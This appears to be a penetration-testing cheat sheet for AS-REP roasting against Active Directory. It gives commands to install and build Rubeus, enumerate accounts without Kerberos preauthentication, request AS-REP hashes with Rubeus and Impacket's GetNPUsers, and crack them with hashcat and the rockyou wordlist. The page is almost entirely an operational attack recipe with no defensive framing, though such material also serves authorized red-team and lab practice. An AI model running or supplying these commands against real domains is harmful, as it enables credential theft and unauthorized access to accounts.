Skip to main content

How to Install

https://github.com/GhostPack/Rubeus

Clone

git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

Compile

dotnet build -c Release

Binary output

Rubeus/bin/Release/net462/Rubeus.exe

Kali Linux Package

sudo apt install rubeus
rubeus -h
rubeus ~ Raw Kerberos interaction and abuses

Binary location

/usr/share/windows-resources/rubeus/Rubeus.exe

Enumerate vulnerable users

Get-DomainUser -PreauthNotRequired -verbose

Request AS-REP hashes

Rubeus

.\Rubeus.exe asreproast /nowrap

Impacket (single user)

impacket-GetNPUsers -dc-ip IP-DC -request -outputfile hashes.asreproast DOMAIN/USER

Impacket (user list)

impacket-GetNPUsers corp.com/ -usersfile users.txt -dc-ip IP-DC -request -format hashcat -outputfile hashes.txt

Crack hashes

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force